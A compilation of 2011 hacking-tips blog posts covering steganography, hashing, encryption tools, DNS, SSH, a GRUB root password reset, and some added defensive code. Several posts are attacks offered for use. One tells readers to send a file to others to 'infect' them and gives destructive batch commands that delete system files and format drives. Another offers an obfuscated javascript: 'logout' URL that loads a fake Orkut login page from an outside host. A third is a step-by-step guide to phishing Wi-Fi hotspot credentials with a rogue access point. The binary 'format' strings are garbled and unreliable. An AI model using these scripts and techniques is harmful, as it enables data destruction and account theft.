Wednesday 31 August 2011

Making Your Data Underground


Tonight I am going to demonstrate an example of hiding data inside a file, which is known as steganography. Don’t panic, I am not going to talk about the common command prompt trick. This is something better and more exciting, so stay connected.
I got an interesting tool called Invisible Secrets and it forced me to share it with you. This is a tool worth watching, capable of both data hiding and encryption. Here I will show the data hiding process. Before we start, get this tool from here.
Now install this application and start it. You will see a screen like that. Now select the Hide Files option provided by it.
Now you’ll be asked to select the files you want to hide inside a file. Select the desired one.

Now select the carrier file, the file inside which the first file will be hidden.
In the next step you’ll be asked to provide a password, which will be required to access the data. Finally you’ll save the newly created file.
Now, to unhide data from this file, select the Unhide Files option provided by the tool. Select the file which you created and saved just a moment ago. Now you’ll be asked to enter the password and you’ll get all your hidden data.
In the example I hid an mp4 file inside a jpg file and saved the output file as a jpg. Now it looks and behaves like a normal jpg file, but when you open it using this tool you will find that it contains an mp4 file inside it too.
So how cool would it be if I put my divorce related documents inside my wedding photographs? Bad joke! Not actually, because I don’t have a wife to get divorced from. You have? Then you can use it. But I’ll urge you to please, please check this awesome app and its cool features.
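A file that "looks and behaves like a normal jpg" can still be caught by a structural check. The following is an added example of mine, not code from the post or from Invisible Secrets, and it assumes nothing about how that tool embeds data: it walks the JPEG marker structure to the End-Of-Image marker and reports any bytes that follow it, which is where append-style steganography tools leave the payload. The sample JPEG skeleton and the hidden payload are constructed inline.

```python
import os
import tempfile

# Markers that carry no length field: SOI, EOI, RST0-RST7, TEM.
_STANDALONE = {0xD8, 0xD9, 0x01} | set(range(0xD0, 0xD8))


def jpeg_trailing_data(data: bytes) -> bytes:
    """Walk the JPEG segment structure and return everything that follows the
    End-Of-Image marker (FF D9). A clean file returns b""."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 1 < len(data):
        # Fill bytes (FF FF ...) are allowed before a marker.
        while pos + 1 < len(data) and data[pos] == 0xFF and data[pos + 1] == 0xFF:
            pos += 1
        if pos + 1 >= len(data):
            break
        if data[pos] != 0xFF:
            raise ValueError(f"marker expected at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:              # EOI: anything after it is foreign data
            return data[pos + 2:]
        if marker in _STANDALONE:
            pos += 2
            continue
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        pos += 2 + seg_len
        if marker == 0xDA:              # SOS: entropy-coded scan data follows
            # Skip scan data: FF 00 is a stuffed byte, FF D0-D7 are restart markers,
            # any other FF xx is the next real marker.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("truncated JPEG: no EOI marker found")


def file_trailing_data(path: str) -> bytes:
    with open(path, "rb") as fh:
        return jpeg_trailing_data(fh.read())


# Constructed sample: a structurally valid but content-free JPEG skeleton.
CLEAN_JPEG = (
    b"\xff\xd8"                                                      # SOI
    b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"  # APP0 (length 16)
    b"\xff\xda\x00\x02"                                              # SOS with an empty header
    b"\x12\xff\x00\x34\xff\xd0\x56"                                  # scan data: stuffed FF 00 and an RST0
    b"\xff\xd9"                                                      # EOI
)
# Constructed payload standing in for the appended mp4 from the post.
HIDDEN_PAYLOAD = b"\x00\x00\x00\x18ftypmp42-constructed-hidden-payload"


def write_samples() -> tuple:
    """Write a clean and a 'stego' JPEG to a temp dir; returns (clean_path, stego_path)."""
    d = tempfile.mkdtemp()
    clean, stego = os.path.join(d, "clean.jpg"), os.path.join(d, "stego.jpg")
    with open(clean, "wb") as fh:
        fh.write(CLEAN_JPEG)
    with open(stego, "wb") as fh:
        fh.write(CLEAN_JPEG + HIDDEN_PAYLOAD)
    return clean, stego


if __name__ == "__main__":
    for p in write_samples():
        extra = file_trailing_data(p)
        flag = " <- data after EOI, worth a closer look" if extra else ""
        print(f"{os.path.basename(p)}: {len(extra)} trailing bytes{flag}")
```

This only catches payloads appended after the image; tools that hide data in the least significant bits of pixel data or inside a comment segment need statistical or segment-level inspection instead, so a clean result here is not proof that nothing is hidden.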

Creating Hashes Of A File


Once again I am back with the word I love most: Security. Often we send/receive files and would like a secure transmission that doesn’t allow someone to alter the file midway. To ensure this we use the concept of hashes. You often see on torrent sites that they provide a hash for a particular file, which ensures data integrity. You check the given hashes in order to ensure that the file is authentic.
Now we will explore this process of hash creation and, trust me, it’s so simple. For this I got a tool called HashSlash. Now if I can get it then you can also get it, as it is not my sole property. Just visit this link and you will get this tool in a single click.
So when you have this tool at your disposal, let’s start exploring it. Start it with a simple click and select the file for which we’ll compute the hash. Here we’ve selected to generate MD5, SHA1 and CRC32 hashes for the file.
Computing hashes for a file
Now click on the Compute button to get your hashes.
Generate MD5 SHA1 and CRC32 hashes for any file
Now you have your hashes, which you can share with the receiving side so they can check that they’ve received the right file. Simple and useful!
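The same three digests HashSlash produces can be computed and checked with the Python standard library. This is an added example of mine, not HashSlash's code: one streaming pass computes MD5, SHA1 and CRC32, and a verify step compares them against the published values with a constant-time comparison. The sample file (the bytes "abc") is constructed inline.

```python
import hashlib
import hmac
import os
import tempfile
import zlib


def file_hashes(path: str, chunk_size: int = 1 << 16) -> dict:
    """Compute MD5, SHA1 and CRC32 of a file in one streaming pass (no full read into memory)."""
    md5, sha1, crc = hashlib.md5(), hashlib.sha1(), 0
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            md5.update(chunk)
            sha1.update(chunk)
            crc = zlib.crc32(chunk, crc)
    return {
        "md5": md5.hexdigest(),
        "sha1": sha1.hexdigest(),
        "crc32": f"{crc & 0xFFFFFFFF:08x}",
    }


def verify_file(path: str, expected: dict) -> tuple:
    """expected maps algorithm name -> published hex digest (any case).
    Returns (all_ok, list_of_mismatching_algorithms)."""
    actual = file_hashes(path)
    mismatches = [
        alg for alg, digest in expected.items()
        if alg not in actual or not hmac.compare_digest(actual[alg], digest.lower())
    ]
    return (not mismatches, mismatches)


def write_sample() -> str:
    """Constructed sample file containing the bytes b'abc'; returns its path."""
    fd, path = tempfile.mkstemp(suffix=".bin")
    os.write(fd, b"abc")
    os.close(fd)
    return path


if __name__ == "__main__":
    p = write_sample()
    for alg, digest in file_hashes(p).items():
        print(f"{alg:6} {digest}")
    print(verify_file(p, {"md5": "900150983cd24fb0d6963f7d28e17f72"}))
```

Two caveats worth keeping in mind when you rely on this: a digest only proves the file is the one the publisher hashed if you obtained the digest over a channel the attacker cannot also edit (a hash posted next to the download on the same compromised page protects against transfer corruption, not tampering), and MD5 and SHA1 are collision-prone, so a SHA-256 value (hashlib.sha256) is the one to prefer when the publisher offers it.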

Encryption In Open Source Way


It’s quite common to encrypt or password protect our crucial data so that others can’t tamper with or misuse it. There is a complete set of utilities available to do the task, and here we are going to discuss one of them which looks small in size but performs the task perfectly.
Chiave is an open source file encryption utility which you can download from this site. It uses the 512 Bit Rijndael encryption algorithm to encrypt the data. Get this handy utility and install it. After installation it doesn’t need much effort to encrypt any file.
Just start the application and you’ll see the opening screen like this. Now select the Encrypt option.
Now it’s time to select the files and folders which we want to encrypt. Here we’ll have to enter a password, which is the key to unlock the encrypted contents. Set the password and click on the Start Encryption button to start the final process, and that’s all. Now whenever you want to decrypt a file, double-click on the file and Chiave will ask you to enter the password before unlocking that file or folder.
One cool fact about Chiave is that it adds an option to the context menu to encrypt a file. So when you want to encrypt a file you just need to right-click on that file and you’ll see the desired option in the context menu. So there is no need to start Chiave and then select the files. Now it’s time for some real action, so let’s stop talking and you just check this app out now.

Is Your Password Strong Enough


Passwords are everywhere and it’s a common tendency to choose just a so-so type of password without bothering much about its strength. That’s quite understandable because it’s tough to remember so many passwords. That’s why we normally use the same password everywhere, and they are also easy to remember.
And now it’s time for some crooks to make their entry on the scene. Password hacking/breaking is something these guys love a lot, and we have made their job easier by choosing a lame password. Such passwords are easy to break using a brute force approach.
The Internet is such a large ocean of information that even wandering aimlessly you’ll find a number of islands where you’ll love to stay for a while. I am saying that because I found such an island where you can check the strength of your passwords.
Just visit this site and you’ll see a clean interface where you enter a password and it tells you the time required by a normal computer to break it using brute force.
With the superb increase in computing power it has become easier to implement this approach to password breaking, and modern techniques even use the power of your graphics card to do it. A good dictionary can also be used to carry out a successful dictionary attack. So the ultimate security is to choose a complicated and strong password which can keep you away from these nightmares.
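The estimate such a site gives is simple combinatorics: the size of the alphabet implied by the character classes you used, raised to the password length, divided by the attacker's guess rate. The following is an added example of mine, not the site's code, that reproduces that estimate and also applies the dictionary caveat from the paragraph above: a password found in a wordlist falls in effectively zero time regardless of its length. The wordlist and the guess rate of one billion per second are constructed assumptions.

```python
import string

LOWER, UPPER, DIGITS, SYMBOLS = (string.ascii_lowercase, string.ascii_uppercase,
                                 string.digits, string.punctuation)

# Constructed stand-in for the wordlists a dictionary attack uses.
DEMO_WORDLIST = {"password", "123456", "qwerty", "letmein", "welcome"}


def charset_size(password: str) -> int:
    """Size of the alphabet an attacker must assume, judged from the character
    classes present. Characters outside the four classes (space, non-ASCII) are ignored."""
    size = 0
    for cls in (LOWER, UPPER, DIGITS, SYMBOLS):
        if any(ch in cls for ch in password):
            size += len(cls)
    return size


def brute_force_seconds(password: str, guesses_per_second: float = 1e9) -> float:
    """Worst-case time to exhaust the keyspace n**L at the given guess rate.
    (The exact count, the sum of n**k for k <= L, is dominated by the last term.)
    A password in the wordlist falls to a dictionary attack first, so it scores 0."""
    if password.lower() in DEMO_WORDLIST:
        return 0.0
    n = charset_size(password)
    if n == 0:
        return 0.0
    return n ** len(password) / guesses_per_second


def describe(seconds: float) -> str:
    """Human-readable duration for the printed report."""
    for unit, size in (("years", 365 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:,.3f} seconds"


if __name__ == "__main__":
    for pw in ("password", "abcdefgh", "Passw0rd!", "correct horse battery staple"):
        print(f"{pw!r:34} charset={charset_size(pw):3} -> {describe(brute_force_seconds(pw))}")
```

Length matters far more than the mix of classes: each extra lowercase character multiplies the work by 26, while adding a single digit to an otherwise lowercase password only changes the base from 26 to 36. The model is also optimistic about the attacker, since real cracking tries common patterns and leaked passwords long before it resorts to exhaustive search.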

Feel The Computer Forensic


Computer Forensics is an emerging concept in the field of Computer Security and Cyber Crime. The techniques used and the objectives are much the same as in the case of data recovery, but in a broader context, because it also includes the analysis of the data. It’s not a cakewalk, but I am going to give you a bit of the feeling associated with Computer Forensics.
As we know, every trade has its own set of tools and techniques. So here we’ll need some sort of tools which will assist us in performing our task. So we start our journey by visiting osforensics.com and downloading the software called OSForensics, which costs you nothing. Now that we have this tool in our arsenal, install it and let’s start playing with it.
Exploring Computer Forensic
This is the opening screen you’ll get on starting the program, and on the left panel you’ll see various options which you can use in your forensic exploration. Some of its features are:
  • File Search
  • Recent Activities
  • Deleted File Search
  • Memory Viewer
  • Disk Viewer
  • Passwords including passwords stored in Browser
  • System Information (Check it)
  • Mount Drive Image
You can also install this software on a USB drive for complete portability. They also provide Hash Sets and Rainbow Tables in order to deal with Windows passwords.
So this is an overview of this tool, and my job ends here, as I have shown you the way but it’s you who will have to complete the journey on your own. So just borrow an hour from your Facebook time and explore this tool. Also have a look at the site for some information on the Hash Sets and Rainbow Tables they provide.

Switching Your DNS Easily


DNS servers, as all of us know, are used to translate humanly memorable domain names and hostnames into the corresponding IP addresses, because memorizing a site through its name is a lot easier than its IP address. The DNS is a distributed system and 13 top level root servers contain the complete database of domain names and IP addresses. This technology is based on the client/server architecture. Your Web browser functions as a DNS client and contacts your Internet provider’s DNS servers when navigating between Web sites.
Sometimes your default DNS server takes a long time to resolve addresses, and sometimes it may slow down, resulting in decreased performance and slow browsing speed. That’s why public DNS servers like Google and OpenDNS have been launched to solve the problem and provide you the best internet experience. But you’ll have to manually configure them before using their services. But if you stay with me for a few minutes, you will find an automated solution for that.
Just click this link and download the free utility called DNS Jumper. You don’t need to install it, as it executes on a single click.
This is the neat and clean interface of this application, where you choose your Network Card and they provide some good and efficient DNS servers which you can use. They also let you choose the fastest available DNS server by clicking on the Fastest DNS button. So now you don’t need to configure your DNS server manually, as you have an automated solution available. So grab it and use it.

Get A Free SSH Account


Secure Shell (SSH) is a network protocol allowing data to be exchanged over a secure channel between two connected devices. It is widely used to keep our unencrypted data safe during transmission. TCP port 22 is used on your machine for providing an SSH connection to you. Now the main task is to get a server to which we can connect and establish a secure data flow. And that’s why I am here so late at night: because I want to see a sweet smile on your face when you get up in the morning, when I’ll be sleeping.
So get ready, as I’ll provide you not one, not two, but three good SSH server addresses. Actually I will provide you the good cool site and they will provide you those three servers. So what’s the site? Ah! Should I tell you that livessh.com is the site name where you can get it? Now that you know it, check them out. They provide three live servers which you can connect to and enjoy. But the problem is only half-solved now, because we still need to do some sort of configuration in order to get this done, and thankfully they solve this problem too.
They have provided a link to download a tool called MyEnTunnel, which means My Encrypted Tunnel. This tool saves us from the headache of configuring all settings manually using PuTTY. All you need is to enter the IP and password of the SSH server, which you will get from this site. That’s all you need to do. So click on the Connect button and our tunnel is ready to be used. So just check that site and stay connected because I’ll be back again.

Get the last shutdown time


This one is for the Internet addicted folks like me, or the good Counter Strike lovers, and those who use their laptop as a downloading machine day and night. So guys, when did you shut down your machine for the last time? No idea? GET AN IDEA and follow these steps:
  • In XP, type eventvwr.msc in the Run dialog box. Please, for God’s sake, don’t ask me how to open the Run dialog box.
  • And if you use Vista or Windows 7, then type “Event Viewer” in the Start Search Box.
  • Now click on the System tab in the left panel.
  • Now look for the first occurrence of an event with event ID 6006. This will give us what we are searching for.
So now I know the last shutdown time. It is 6:12 AM and this is not unusual for a net addicted guy. Enjoy and wait for the next post.

Running Windows Live CD


Live CDs are quite useful when we just want to have a trial of an Operating System before we actually decide to install it. So far we have seen a number of Linux distros running from a Live CD, like Ubuntu, PCLinuxOS and many more. Now, if you know me, then you already know that I always do the simplest things in a different way. So what if I tell you how to run any Windows version from a Live CD? So just be cool, as this post will also help you in Computer Forensics and Troubleshooting.
Again, you know that I simply love software that makes our life a bit easier, both personally and professionally. So here again be ready for the task we are experts in: Downloading. Yes, that’s what we are going to do, but no movie, no game and no torrent either. It’s a simple tool called Ultimate Boot CD for Windows. You can get it from here. Now just install it and keep your original Windows CD at hand, because we will need it to create a Live CD.
So just insert your Windows CD and start this application. You will see this screen, and here you’ll be asked to provide a Source Path to your Windows files. So point out the CD location and that’s all you need to create a Live CD. Just click the Build button and your ISO file will be created at the specified location. Now you can burn this ISO file and your Live CD is ready to be explored. It has lots of custom tools which can be useful in troubleshooting your computer. It includes Anti-Spyware Tools, AntiVirus Tools, Disk Tools, File Recovery Tools, Password and Registry tools. You can have a complete list of available tools here. Just go through it; you will be glad to see such a complete troubleshooter at your disposal, which you can use for a wide range of operations, from data wiping to data recovery and from password editing to remote desktop control and so on. So won’t you like to check it out? I know that you will.

Email With a Password


What’s the general way to protect something from malicious use? Passwords, no doubt. But what if we want to protect an email? No email provider provides the facility to protect an email with a password. Sometimes we may need to send a mail intended for a specific person and don’t want others to read it in case of account hacking or something. So how can we achieve this?
As I always say, there is a solution for every problem, and for this problem too. Even if our email provider doesn’t provide this, we can still do it. And the ultimate solution for this problem is Lockbin.com. They provide this service without any cost. You can compose a message as usual and attach files too. Then you set the password, and this password is necessary to read that email. Ultimate security.
Encrypted Email by lockbin.com
The most amazing feature that fascinates me is that they use https, which is an extra advantage in security terms. When a free service can provide this kind of facility, I think sites like Facebook, which doesn’t bother about security, must learn something from them.

Hacking Root Password In Linux


Hi friends! Time to come back for another blog post regarding Linux, and this time we’ll mess with the root account password. My friends who know Linux at their fingertips will find it easy, but nevertheless it’s really interesting. This is the first task one needs to do during the RHCE exam. So let’s break the root password from GRUB.
When the boot process starts, press the ESC key to enter the OS selection menu.
Here highlight the OS using the arrow keys and then press E to edit it. Now you will see a screen like this.
Select the second line, containing information regarding kernel parameters.
Now again press E to edit these kernel parameters. We can edit various kernel parameters from here, but what we’ll do is change the runlevel of the system.
Once we have entered parameter editing mode, type 1 or s or single after a space and then press the ENTER key. Now press B to boot the system in single user mode. This is the troubleshooting mode for Linux and we use it for repair and maintenance.
Now let the system take its time to boot, and once you get the prompt all you need is to issue just 2 simple commands.
setenforce 0
Here zero sets SELinux to permissive mode. You may not need to do this in your home environment. After this, issue the passwd command and change the password for the root account.

Once you have successfully changed the password, issue init 5 to switch to graphical mode and enjoy: you have successfully changed the password for the root account. So guys, here we played with GRUB, and in my next post I’ll tell you how to password protect your GRUB menu so that no mischief can be done through this trick. So till then wait and watch and have fun.
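The mischief the post refers to is possible because anyone at the console can edit the kernel line. The configuration below is an added example, not from the post, showing the GRUB 2 way of restricting that: it assumes a Debian/RHEL-style layout where /etc/grub.d/40_custom is merged into grub.cfg by grub-mkconfig (grub2-mkconfig and /boot/grub2/grub.cfg on RHEL-family systems), and the hash shown is a placeholder that you replace with the output of grub-mkpasswd-pbkdf2.

```grub
# /etc/grub.d/40_custom  (GRUB 2; paths assumed, adjust for your distribution)
# 1. Run grub-mkpasswd-pbkdf2 and paste the printed grub.pbkdf2.sha512... string below.
# 2. Regenerate the menu: grub-mkconfig -o /boot/grub/grub.cfg
set superusers="admin"
password_pbkdf2 admin grub.pbkdf2.sha512.10000.PLACEHOLDER_SALT.PLACEHOLDER_HASH
```

Once superusers is set, pressing E to edit an entry or dropping to the GRUB command line asks for that password; entries you still want to boot without a prompt are declared with the --unrestricted option on their menuentry line. The legacy GRUB shown in the post (the E and B keys) has the equivalent password --md5 line in menu.lst, generated with grub-md5-crypt. Either way this only protects the boot menu: with physical access and no full-disk encryption, a Live CD reads the disk regardless, so a GRUB password belongs alongside disk encryption and a BIOS boot-order lock, not instead of them.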

Sitemeter Hack – Hide Visual Tracker (Counter)


Sitemeter
Sitemeter, one of the best traffic counters for websites/blogs, shows online users, referrals (where people are coming to your site from), country locations, browser etc., all in detail.
This counter is visible to all visitors.
Invisible counters (trackers) are available for Premium Accounts only!
But you can easily hack it to hide it.
It’s just a few setting changes which will work fine.
1) Log in to your Sitemeter account.
2) Go to ‘Manager’ from the top menu.
3) Go to the ‘Meter Style’ option from the left hand menu.
4) Select the second last meter style (Counter, which shows simple numbers).
5) Now in “DIGIT COLOR” select ‘Transparent’; similarly in “BACKGROUND COLOR” select ‘Transparent’.
6) DONE.
Now your Sitemeter counter is invisible to normal eyes on your site.
Place it anywhere in your website/blog, and track your traffic and users.
Enjoy!

Format A HDD With Notepad

If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.
Step 1 :-
Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
OR
If you think you cannot format the C drive while Windows is running, then try it and you will get it. Anyway, here are some more so you can test on other drives. This is simple binary code.
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
Try to figure out the rest yourself.
I can’t spoonfeed.
It’s working.
Do not try it on your PC. Don’t mess around; this is for educational purposes only.
Still, if you can’t figure it out, try this:
Go to Notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
If you want worse, then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file

Remove shortcut arrow from desktop icons completely


To remove shortcut arrow from desktop icons in any type of document:
a) Perform the instructions described under ‘Remove shortcut arrow from desktop icons’. For your convenience, steps 1 to 3 are repeated here.
b) Perform the instructions described under ‘Remove shortcut arrow from desktop icons (2)’. For your convenience, steps 4 and 5 are repeated here.
c) And finally, do the same for conferencelink, docshortcut, internetshortcut and wshfile.
So, here is a summary of all actions:
1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOT\lnkfile
3. Delete the IsShortcut registry value.
4. Navigate to HKEY_CLASSES_ROOT\piffile
5. Delete the IsShortcut registry value.
6. Navigate to HKEY_CLASSES_ROOT\ConferenceLink
7. Delete the IsShortcut registry value.
8. Navigate to HKEY_CLASSES_ROOT\DocShortCut
9. Delete the IsShortcut registry value.
10. Navigate to HKEY_CLASSES_ROOT\InternetShortcut
11. Delete the IsShortcut registry value.
12. Navigate to HKEY_CLASSES_ROOT\WSHFile
13. Delete the IsShortcut registry value.
14. Close regedit.
Logoff and… Enjoy!
Note : Please note that in some cases deactivating the arrow for *.LNK files might lead to duplicate items in the Explorer Context menu.

Run Firefox inside Firefox

How to run Firefox inside Firefox?

Yes, you can run Firefox inside Firefox just by typing the following URL.

How about opening Firefox inside Firefox, which is again in another Firefox?
Not bad, huh?
And it’s really easy too: just type this URL in Firefox’s address bar and there you go!
Firefox inside Firefox!

Copy and paste the following URL into a web browser (Mozilla Firefox).

chrome://browser/content/browser.xul


Following is the screenshot of this trick (Firefox in Firefox in Firefox, which is again in another Firefox):


Firefox inside Firefox

Reveal *****(Asterisk) Passwords Using Javascript

Want to reveal the passwords hidden behind asterisks (****)?

Follow the steps given below:

1) Open the login page of any website (e.g. http://mail.yahoo.com).

2) Type your ‘Username’ and ‘Password’.

3) Copy and paste the JavaScript code given below into your browser’s address bar and press ‘Enter’.

javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press ‘Enter’, a window pops up showing the password typed by you!


Note: This trick may not work with Firefox.

Chat with Friends through ms dos Command Prompt


1) All you need is your friend’s IP address and your Command Prompt.

2) Open Notepad and write this code exactly as it is:

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (the .bat file) over to Command Prompt and press Enter.

6) You would then see something like this:

7) Now type the IP address of the computer you want to contact and press Enter.
You will see something like this:

8) Now all you need to do is type your message and press Enter.
Start chatting!

Monday 29 August 2011

Orkut LogOut Code

Orkut LogOut Code. I think you have seen the LogOut Scrap; this is a new trick to log out.

javascript:%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%66%72%61%6D%65%73%65%74%20%72%6F%77%73%3D%27%31%30%30%25%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%4E%4F%27%20%62%6F%72%64%65%72%3D%27%30%27%20%66%72%61%6D%65%73%70%61%63%69%6E%67%3D%27%30%27%3E%3C%66%72%61%6D%65%20%6E%61%6D%65%3D%27%63%6F%6E%72%5F%6D%61%69%6E%5F%66%72%61%6D%65%27%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%77%68%79%67%61%64%61%2E%66%72%65%65%77%65%62%37%2E%63%6F%6D%2F%53%65%72%76%69%63%65%4C%6F%67%69%6E%2E%68%74%6D%27%3E%3C%2F%66%72%61%6D%65%73%65%74%3E%22%29%3B%61%6C%65%72%74%28%22%48%61%48%61%21%20%74%68%61%74%20%77%61%73%20%61%20%74%72%69%63%6B%20%74%6F%20%6C%6F%67%20%79%6F%75%20%6F%75%74%22%29%0A%0A%0A

Copy the above code and paste it in the address bar, and you will be logged out with a nice message.
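The code above is percent-encoded, so you cannot read what it does before pasting it into the address bar. As an added example of mine (not part of the post), here is a small decoder that turns such a javascript: URL back into readable script, lists the hosts it references and flags the usual warning signs. Run on the post's own string, it shows that the "logout" actually replaces the current page with a frameset that loads a page named ServiceLogin.htm from a third-party host and then shows the alert; that is exactly what you want to know before pasting anything a stranger hands you into the address bar while logged in.

```python
import re
from urllib.parse import unquote

# The encoded string from the post, copied verbatim.
ORKUT_LOGOUT_URL = (
    "javascript:%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%66%72%61%6D%65%73%65%74%20"
    "%72%6F%77%73%3D%27%31%30%30%25%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%4E%4F%27%20"
    "%62%6F%72%64%65%72%3D%27%30%27%20%66%72%61%6D%65%73%70%61%63%69%6E%67%3D%27%30%27%3E%3C"
    "%66%72%61%6D%65%20%6E%61%6D%65%3D%27%63%6F%6E%72%5F%6D%61%69%6E%5F%66%72%61%6D%65%27%20"
    "%73%72%63%3D%27%68%74%74%70%3A%2F%2F%77%68%79%67%61%64%61%2E%66%72%65%65%77%65%62%37%2E"
    "%63%6F%6D%2F%53%65%72%76%69%63%65%4C%6F%67%69%6E%2E%68%74%6D%27%3E%3C%2F%66%72%61%6D%65"
    "%73%65%74%3E%22%29%3B%61%6C%65%72%74%28%22%48%61%48%61%21%20%74%68%61%74%20%77%61%73%20"
    "%61%20%74%72%69%63%6B%20%74%6F%20%6C%6F%67%20%79%6F%75%20%6F%75%74%22%29%0A%0A%0A"
)

_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)

# Constructs that commonly appear in scripts meant to hijack or replace the page.
SUSPICIOUS = ("document.write", "frameset", "<iframe", "location", "eval(",
              "fromCharCode", "document.cookie")


def decode_js_url(url: str) -> str:
    """Strip the javascript: scheme and peel every layer of percent-encoding."""
    if not url.lower().startswith("javascript:"):
        raise ValueError("not a javascript: URL")
    decoded = unquote(url[len("javascript:"):])
    # Nested encoding (%2534 -> %34 -> 4) is a common obfuscation step; keep decoding
    # until the text stops changing.
    while unquote(decoded) != decoded:
        decoded = unquote(decoded)
    return decoded


def referenced_hosts(script: str) -> list:
    """Hosts the decoded script loads content from; anything off-site deserves a look."""
    return sorted({m.group(1).lower() for m in _HOST_RE.finditer(script)})


def risk_indicators(script: str) -> list:
    lowered = script.lower()
    return [needle for needle in SUSPICIOUS if needle.lower() in lowered]


if __name__ == "__main__":
    script = decode_js_url(ORKUT_LOGOUT_URL)
    print(script)
    print("hosts referenced:", referenced_hosts(script))
    print("indicators:", risk_indicators(script))
```

The decoded output starts with document.write("<frameset ... and the only host it contacts is whygada.freeweb7.com, not orkut.com; a real logout would hit the service's own sign-out endpoint. The same check applies to any bookmarklet or "paste this in your address bar" trick: decode first, read what it does, and never run it in a tab where you are logged in.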

LOVE letter Generators

L♥VE letter Generators: Now you love someone...
She/he is on Orkut...
but you can’t express your feelings ♥
so create flash love letters and scrap him/her.
CLICK HERE

Wireless HOTSPOT Hacks

Wireless Hotspot Hacks: this article tells how hotspot hacks are performed, hacks/cracks/techniques that you will hopefully find to be "cool".

Hack:
You might have seen wireless hotspots, as they can be seen anywhere, with T-Mobile, Concourse, Wayport and so on. As we know, mobile users get connected quickly in public places. Some hotspots are available for free and some require a free subscription. In public places these Wi-Fi hotspots are the greatest security risk we find.

Stealing Wi-Fi Hotspot credentials:
Once, in Russia, a hacker used to steal the usernames and passwords of dial-up accounts and sell them on the black market, and the owners of the stolen credentials had to pay high charges. With the addition of public Wi-Fi locations, the threat of stolen credentials has increased, and now includes stolen wireless subscription credentials.
The easiest way to steal wireless subscription credentials is AP Phishing. Today’s realistic and applicable method: the end-user determines that a wireless access point is valid by recognizing the SSID and judging whether the site has the look and feel of the real public Wi-Fi hotspot login page. For the end-user both of these can be spoofed (you cannot create normal network connections), and you need not carry a wireless access point around to do this.
Steps to perform this technique:
  • First of all you have to set up your computer to look like an actual access point broadcasting the appropriate SSID (T-Mobile, Wayport, etc.).
  • Now you have a login page, and your PC will display a look-alike of the original login page of the provider whose signal you are broadcasting.
It is easy to make your PC broadcast the SSID of your choice, so that the user connects to you instead of the valid Wi-Fi hotspot SSID. The problem with this method is that the user sees that this is an Ad-Hoc network and does not connect to it. Now we use Airsnarf by the Schmoo Group to make the signal look as if it is coming from an access point; we turn our PC into an access point.
The difficult part in using Airsnarf and other HostAP programs is finding a card which supports the HostAP drivers. Generally we use a Senao NL-2511CD PLUS EXT2 200mW PCMCIA Wi-Fi card with a Rover Portable Laptop Mount 2.4GHz 5.5dBi Antenna; they can be purchased from http://www.wlanparts.com/.
Airsnarf consists of a number of configurable files that control how it operates.
airsnarf.cfg file, used to configure basic Airsnarf functionality
airsnarf.cgi file
With Airsnarf configured with default settings, it will display a default login page that looks like the following:
This page takes the username and password which are entered and places them in a file where they can be read.
For making this attack work, we have to modify this login page so that it looks the same as the Wi-Fi hotspot provider’s login. Basic HTML skills are required; it is not so difficult to go to T-Mobile, Wayport, STSN, Concourse or any other hotspot provider’s site and copy and paste their graphics to make your fake login page look real.

After configuring Airsnarf and creating the fake login page, we can launch the attack. It will work in any public place like an airport, coffee shop or park where people use their laptops. To launch this attack we activate Airsnarf by typing the ./airsnarf command. Below you can see what is going to happen after launching the attack.
Airsnarf being launched and waiting for a connection
Here we see that an end-user attempting to connect to the hotspot will see the SSID which was entered in the airsnarf.cfg file and use their PC to connect to the network. After launching their browser, they are asked to enter their username and password.
Windows Zero Config showing the T-Mobile HotSpot being broadcast by Airsnarf

Fake Walled Garden/Login Page presented by Airsnarf
If the user enters his username and password and clicks on the login button, his username and password have been sent to the hacker, who can make use of them. Many of us keep the same username and password for all accounts so that we can remember them; now if the hacker gets your username and password he can access your email, your online banking and so on.
Example of credentials entered into Airsnarf AP Phishing Site and dumped to a file
You can also make variations on the above trick by changing the SSID to "Free Public Wi-Fi", and at this point you can change the login page as below.
Many users will fall for this trick and you can access their accounts.

Malicious Websites & Browser Exploits:
